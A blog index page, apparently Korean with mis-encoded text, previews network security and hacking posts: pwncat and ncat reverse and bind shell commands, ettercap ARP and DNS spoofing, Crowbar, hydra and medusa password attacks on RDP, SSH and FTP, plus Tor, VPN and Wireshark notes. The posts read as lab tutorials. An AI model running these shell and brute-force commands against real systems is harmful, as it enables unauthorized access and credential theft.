728x90 ๐์ ๋ณด๋ณด์/๋คํธ์ํฌ ๋ณด์25 ๋คํธ์ํฌ ๋ณด์ - Mullvad VPN ํฌํธํฌ์๋ฉ์ผ๋ก ์น ์๋ฒ ์ธ๋ถ์์ ์ ์ Mullvad VPN ์ฌ์ดํธ: ๊ณ์ > ์ฅ์น ํญ์์ ๋ด ์ฅ์น ํ์ธ ์ฃผ์: https://mullvad.net/ko/account/#/devices ๋ด ์ฅ์น์์ "ํฌํธ ์ถ๊ฐ" ํด๋ฆญ ํฌํธํฌ์๋ฉ ์ค์ ๋ฐฐ์ ๋ ํฌํธ ๋ฒํธ ํ์ธ ๋๋ผ-๋์-ํฌํธ๋ฒํธ ํ์์ด๋ฉฐ ๋ค์ ์ซ์ ๋ฒํธ๊ฐ ์ง์ ๋ฐ์ ๋ด ํฌํธ ๋ฒํธ์ด๋ค. Mullvad VPN ํ๋ก๊ทธ๋จ์์ ํฑ๋๋ฐํด(์ค์ ) ํด๋ฆญ "VPN ์ค์ " ํด๋ฆญ ํฐ๋ ํ๋กํ ์ฝ ํญ๋ชฉ์์ "OpenVPN"์ ์ ํ ๋ฐ๋์ VPN ์๋ฒ์ ์ฐ๊ฒฐ๋ ์์น๊ฐ ํฌํธํฌ์๋ฉ ํ์ด์ง์์ ์ค์ ํ ์์น๋ ์ผ์นํ๋์ง ํ์ธ Mullvad VPN ์ฌ์ดํธ์์ ํฌํธ ์ ์ ํ์ธํ๊ธฐ ์ฃผ์: https://mullvad.net/ko/check ์์ ์ IPv4 ์ฃผ์๋ฅผ ์ฐ์ ํ์ธ ๋ฐ๋ก ํ๋จ์ "ํฌํธ ํ์ธ" ํญ์ผ๋ก ๋ค์ด๊ฐ ๋ฐฉ๊ธ ์ ์ ํ์ธํ ํฌ.. 2023. 3. 19. ๋คํธ์ํฌ ํดํน - pwncat ๋ฆฌ๋ฒ์ค์ ๋ช ๋ น์ด pip ์ค์น ๋ช ๋ น์ด pip install pwncat victim(ํด๋ผ์ด์ธํธ)์ด ๊ณต๊ฒฉ์(์๋ฒ) ์ ์์ ์ํ ์ค์น ๋ช ๋ น์ด sudo pip install pwncat-cs ์๋ ๊ณต๊ฒฉ์๊ฐ python3 -m pwncat ๋ช ๋ น์ด๋ฅผ ์ฐ๊ธฐ ์ํ ์ค์น ๋ช ๋ น์ด TCP Reverse shell(ํด๋ผ์ด์ธํธ) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10์ด๋ง๋ค ์ฌ์ฐ๊ฒฐ ์๋ ๊ณต๊ฒฉ์ ๋ฆฌ๋ฒ์ค์ ์๋ฒ ์คํ python3 -m pwncat -lp 4444 pwncat ํ๋กฌํํธ ๋ช ๋ น์ด / ๋จ์ถํค sessions: ์ฐ๊ฒฐ๋ victim๋ค ํ์ธ sessions {ID}: ์ํธ์์ฉ ํ๋ ค๋ victi.. 2023. 3. 16. ๋คํธ์ํฌ ๋ณด์ - ์์ดํผ๋ก ์ ์์ ์ธ ํผํด ์ฌ๋ก ๊ฒ์(criminalip.io) https://www.criminalip.io/ko Cybersecurity Search Engine | Criminal IP Criminal IP is a Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform to find everything in Cybersecurity with impressive amount data capacities, API speed, and price. www.criminalip.io 2023. 3. 12. ๋คํธ์ํฌ ๋ณด์ - ์์ด์ด์คํฌ(Wireshark) SSL handshake ํํฐ Useful Wireshark filter for analysis of SSL Traffic. Client Hello: ssl.handshake.type == 1 Server Hello: ssl.handshake.type == 2 NewSessionTicket: ssl.handshake.type == 4 Certificate: ssl.handshake.type == 11 CertificateRequest ssl.handshake.type == 13 ServerHelloDone: ssl.handshake.type == 14 Note: “ServerHellpDone” means full-handshake TLS session. Cipher Suites: ssl.handshake.ciphersuite I fo.. 2022. 9. 22. ๋คํธ์ํฌ ๋ณด์ - VPN๋ณด๋ค ๊ฐ๋ ฅํ ์ฐจ์ธ๋ ๋ณด์์๋ฃจ์ (SPN) VPN ๋ฐฉ์ VPN ํด๋ผ์ด์ธํธ๊ฐ ์ํธํํ ๋ฐ์ดํฐ๋ฅผ VPN ์๋ฒ์๊ฒ ์ ๋ฌํ๋ฉด ISP๊ฐ ๋ฐ์ดํฐ๋ฅผ ์์๋ณผ ์๊ฐ ์๋ค. ํ์ง๋ง VPN ์๋ฒ์๋ ์ํธํ๋ฅผ ๋ณตํธํํ ์ ์๋ ํค๊ฐ ์กด์ฌํ๊ธฐ ๋๋ฌธ์ ์ธ์ ๋ ์ฌ์ฉ์์ ๊ฐ์ธ์ ๋ณดํธ๋ฅผ ๋ก๊น ํ๋๊ฒ ๊ฐ๋ฅํ๋ฏ๋ก 100% ์ ๋ขฐํ๊ธฐ ์ด๋ ต๋ค. SPN(Safing Privacy Network) ๋ฐฉ์ ๋ง์น Tor ๋คํธ์ํฌ์ฒ๋ผ ๋ ธ๋๋ฅผ ์ฌ๋ฌ ๊ฐ๋ฅผ ๊ฑฐ์ณ์(๋ฉํฐํ) ์๋ฒ์ ๋ฐ์ดํฐ๋ฅผ ์์ฒญํ๋ ๋ฐฉ์ ๋น์ฐํ ๋ ธ๋๋ค๊ณผ ์ฐ๊ฒฐ ๊ด๊ณ๋ฅผ ํ์ฑํ๋ฉด ๋ ธ๋๋ค์ ์ฃผ๋ณ์ ๋ค๋ฅธ ๋ ธ๋๋ค(์์ , ์ก์ )์ ์ ๋ณด๋ง ๊ฐ์ง๊ณ ์์ง ์์ค์ ๋ฐ์คํฐ๋ค์ด์ ์ ์ ๋ณด์ ๋ฐ์ดํฐ ์ ๋ณด๋ ์ํธํ๊ฐ ๋์ด ํ์ธํ ์ ์๋ค. Portmaster์ SPN ์์ฐ ์์ https://youtu.be/p3tjNmFKrDk ์ถ์ฒ: https://safing.io.. 2022. 8. 28. ๋คํธ์ํฌ ํดํน - ๋งฅ(MacOS) ๋ฆฌ๋ฒ์ค ์(Reverse Shell), ๋ฐ์ธ๋ ์(Bind Shell) ์ฐ๊ฒฐ ์ค์ต ํ๊ฒฝ ๊ณต๊ฒฉ์ ํ๊ฒฝ: Ubuntu IP: 192.168.0.5 ๊ณต๊ฒฉ ๋์ MacOS(10.13.6) IP: 192.168.0.6 * ๋งฅ์์๋ nc ๋ช ๋ น์ด๊ฐ ๋์ง ์๋ ๋ฌธ์ ๋ก ๋์ ncat ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์๋ค. ๋ฆฌ๋ฒ์ค ์ ๊ณต๊ฒฉ์๊ฐ ์ง์ ์๋ฒ๋ฅผ ์ฌ๋ ๋ฐฉ์์ผ๋ก ๊ณต๊ฒฉ ๋์์์ ๋งํ์๋ ๋ฐฉํ๋ฒฝ(์์๋ฐ์ธ๋)์ ์ฐํํ ์ ์๋ค. ๊ณต๊ฒฉ์(Ubuntu) nc -lvp 4444 ๊ณต๊ฒฉ ๋์(MacOS) ncat 192.168.0.5 4444 -e /bin/zsh ๋ฐ์ธ๋ ์ ๊ณต๊ฒฉ ๋์์๊ฐ ์ง์ ์๋ฒ๋ฅผ ์ฌ๋ ํํ์ด๋ค. ๊ณต๊ฒฉ ๋์(MacOS) ncat -lvp 4444 -e /bin/zsh ๊ณต๊ฒฉ์(Ubuntu) nc 192.168.0.6 4444 ์ถ์ฒ: https://hobbylists.tistory.com/entry/kal.. 2022. 8. 5. ๋คํธ์ํฌ ํดํน - tor ์๋ ์๋ฆฌ ๋ค์์ Tor ํด๋ผ์ด์ธํธ A (์๋ณธ)์์ Tor ์๋ฒ B, C๋ฅผ ์ฐจ๋ก๋ก ๊ฑฐ์ณ ๋ชฉ์ ์ง D (์ผ๋ฐ Web ์๋ฒ ๋ฑ)์ ์ด๋ฅด๋ ๊ฒฝ์ฐ์ ์ค๋ช ์ด๋ค. 1. A๋ ๋ฏธ๋ฆฌ ์ป๊ณ ์๋ ๋๋ ํ ๋ฆฌ ๋ชฉ๋ก์์ ์์๋ก B์ C๋ฅผ ์ ํํ๋ค. 2. A๋ B์ ๋ํด ๊ฐ์ ํ์ ์ฐ๊ฒฐ ์์ฒญ, AB ์ฌ์ด์ ์ํธํ ํต์ ์ ์ํ ์ธ์ ํค๋ฅผ ๊ตํํ๊ธฐ ์ํ ์ ๋ณด์ ํจ๊ป ์ ๋ฌํ๋ค. 3. B๋ A์ ๊ฐ์ ํ์ ์ฐ๊ฒฐ ์๋ฝ๊ณผ ํจ๊ป ์ธ์ ํค ๊ตํ์ ์ํ ์ ๋ณด๋ฅผ ์ ์กํ๋ค. 4. AB ์ฌ์ด์ ์ ๋จ๊น์ง ์ป์ ์ธ์ ํค๋ ์ํธํ ํต์ ๋ก ์ป์ ์ ์๋ค. ์ดํ AB ๊ฐ์ ํต์ ์ด ์ํธํ ํต์ ๊ฒฝ๋ก๋ฅผ ์ฌ์ฉํ์ฌ ํํด์ง๋ค. 5. A๋ B์ ๋ํด "B๊ฐ C์ ๋ํ ๊ฐ์ ํ์ ์ฐ๊ฒฐ์ ์๊ตฌ๋ฅผ ์ ์ถํ๋ ๊ฒ"์ ์๊ตฌํ๋ ์ ์กํ๋ค. 6. B๋ C์ ๋ํด ๊ฐ์ ํ์ ์ฐ๊ฒฐ ์์ฒญ, BC ์ฌ์ด.. 2022. 8. 1. ๋ฆฌ๋ ์ค - ssh ์ฐ๊ฒฐ์ tor socks5 ๊ฒฝ์ ํ๊ธฐ ํ์ ํจํค์ง ์ค์น apt install tor apt install connect # nc(netcat)์ด ์ค์น๋์ด ์๋ค๋ฉด ๋ฌด์ ์ค์น ํ์๋ tor๋ฅผ ์คํ์์ผ์ค๋ค. ์ฌ์ฉ ๋ช ๋ น์ด connect ProxyCommand ์ฌ์ฉ ๋ฐฉ๋ฒ ssh -o "ProxyCommand connect -5 -S localhost:9050 %h %p" user@123.123.123.123 nc ProxyCommand ์ฌ์ฉ ๋ฐฉ๋ฒ ssh -o ProxyCommand="nc -x localhost:9050 %h %p" user@123.123.123.123 ํ๋ก์ ์ฑ๊ณต ํ์ธ ๋ช ๋ น์ด Windows netstat -n | findstr 22 Linux/macOS who am i ์์ ๋ช ๋ น์ด ์คํ์์ ๋ด ์ ์ ์์ดํผ๊ฐ tor IP ์ฃผ์๋ก ๋ฌ๋ค.. 2022. 8. 1. ๋คํธ์ํฌ ํดํน - ettercap์ arp ์คํธํ์ ์ด์ฉํด dns ์คํธํํ๊ธฐ ์ฐ์ ettercap ์ผ ๋ค. ๊ทธ๋ฆฌ๊ณ eth0์ ์ ๊ทผ ์ธํฐํ์ด์ค ์๋จ์ ๋ณด๋ฉด ๋๋ณด๊ธฐ ๋ชจ์์ด ์๋๋ฐ ์ด๋ฅผ ํด๋ฆญํด ์ฃผ๋ณ์ ์กด์ฌํ๋ ํธ์คํธ๋ค์ ์ก๋๋ค. ๊ทธ๋ฆฌ๊ณ ํ์ธ๋ ์์ดํผ ์ด๋๋ ์ค๋ค ์ค ๋ผ์ฐํฐ(๊ณต์ ๊ธฐ)๋ก ์ถ์ ๋๋ ๊ฒ์ Target 1์ผ๋ก ์ง์ ํ๊ณ , ์ค๋ํ(๋์ฒญ)์ ๋นํ๊ณ ์ํ๋ ํ๊ฒ์ Target 2๋ก ์ง์ ์ด์ ๋ค์ ์ธํฐํ์ด์ค์ ์๋จ ๋งจ ์ค๋ฅธ์ชฝ์ ์ง๊ตฌ๋ณธ ๋ชจ์์ด ์๋๋ฐ ์ด๋ฅผ ํด๋ฆญํด์ ARP poising...์ ๋๋ฅธ ๋ค์ ์ด๋ฐ ์ฒดํฌ ๋ฐ์ค ์ฐฝ์ด ๋จ๊ฒ๋๋ฉด ์ฌ์ง๊ณผ ๊ฐ์ด "Sniff remote connections."๋ฅผ ์ฒดํฌํ๊ณ OK๋ฅผ ๋๋ฌ ARP ์คํธํ์ ์์ํ๋ค. ์ด์ ํผํด์์ PC๋ฅผ ์กฐ์ํ๋ค. cmd์ ๋ค์ด๊ฐ์ "arp -a"๋ฅผ ์คํ์์ผ์ฃผ๊ฒ ๋๋ฉด (ARP ํ ์ด๋ธ ํ์ธ ๋ช ๋ น์ด) ๊ณต์ ๊ธฐ์ ๋ฌผ๋ฆฌ์ ์ฃผ์๊ฐ ์๋์ ๋ค๋ฅธ.. 2021. 12. 22. ๋คํธ์ํฌ ํดํน - Tor ProxyChains ๋ก์ปฌ ํ๋ก์ ์ค์ https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [์ค์น ๋ฐ ์ค์ ] # tor ์ค์น sudo apt install tor # proxychains ์ค์ ํ์ผ ์์ ํ๊ธฐ sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15. ๋คํธ์ํฌ ํดํน - rdp ์ฌ์ ๊ณต๊ฒฉ ์ฌํ๊ทผ๋ฌด๊ฐ ์ฆ์์ง ์์ฆ RDP(Remote Desktop Protocol)๋ฅผ ์ฌ์ฉํ๋ ์ ์ ๋ค์ด ๊ฝค๋ ๋ง์์ก๋ค. ์ด๋ฐ ์๋์ ํ๋ฆ์ ๋ง์ถฐ์ RDP๋ฅผ ๊ณต๊ฒฉํ๋ ๋ค์ํ ๊ณต๊ฒฉ ๋๊ตฌ๋ค์ด ์๊ฒจ๋ฌ๋๋ฐ, ๊ทธ์ค ํ๋๊ฐ ์ฌ์ ๊ณต๊ฒฉ์ ๋์์ฃผ๋ Crowbar๊ฐ ์๋ค. ๋๊ตฌ๋ฅผ ์ฌ์ฉํ๊ธฐ ์ด์ ์ ๋ฆฌ๋ ์ค์ freerdp๊ฐ ์ค์น๋์ด์์ด์ผ ํจ sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer [์ฌ์ฉ ๋ช ๋ น์ด] ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist hydra๋ก๋ ๊ฐ๋ฅํ๋ค. [์ฌ์ฉ ๋ช .. 2021. 12. 14. ๋คํธ์ํฌ ํดํน - medua, ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ ๋๊ตฌ https://www.kali.org/tools/medusa/ medusa | Kali Linux Tools www.kali.org ์๋ hydra๊ณผ ๊ฐ์ ๋์ ๊ณต๊ฒฉ ๋๊ตฌ์ด๋ค. ์ฌ์ฉ ๋ฐฉ๋ฒ) medusa -h ํธ์คํธ -u ์ ์ -P ์ฌ์ (passwords.txt) -M ๋ชจ๋(ssh|ftp) ssh ์๋ฒ๋ฅผ ๋์์ผ๋ก ์จ๋ดค๋๋ฐ ์ ๋๋ค. example) medusa -h 192.168.0.5 -u root -p qwer1234 -M ssh medusa -h 192.168.0.5 -u root -P passwords.txt -M ftp 2021. 11. 22. ์ด์ 1 2 3 ๋ค์ 728x90